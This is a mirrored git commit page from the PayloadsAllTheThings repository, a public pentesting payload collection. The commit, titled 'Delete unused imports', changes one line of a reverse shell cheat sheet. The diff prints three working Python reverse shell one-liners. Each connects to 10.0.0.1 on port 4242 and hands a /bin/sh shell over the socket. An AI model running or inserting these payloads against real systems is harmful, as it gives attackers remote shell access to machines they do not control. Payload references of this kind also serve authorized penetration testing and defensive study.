mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-03-04 15:27:18 +00:00
Delete unused imports
This commit is contained in:
parent
7e18158c3b
commit
4207479cce
1 changed files with 1 additions and 1 deletions
|
@ -93,7 +93,7 @@ Linux only
|
|||
|
||||
IPv4
|
||||
```python
|
||||
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
|
||||
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
|
||||
```
|
||||
```python
|
||||
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
|
||||
|
|
Loading…
Add table
Reference in a new issue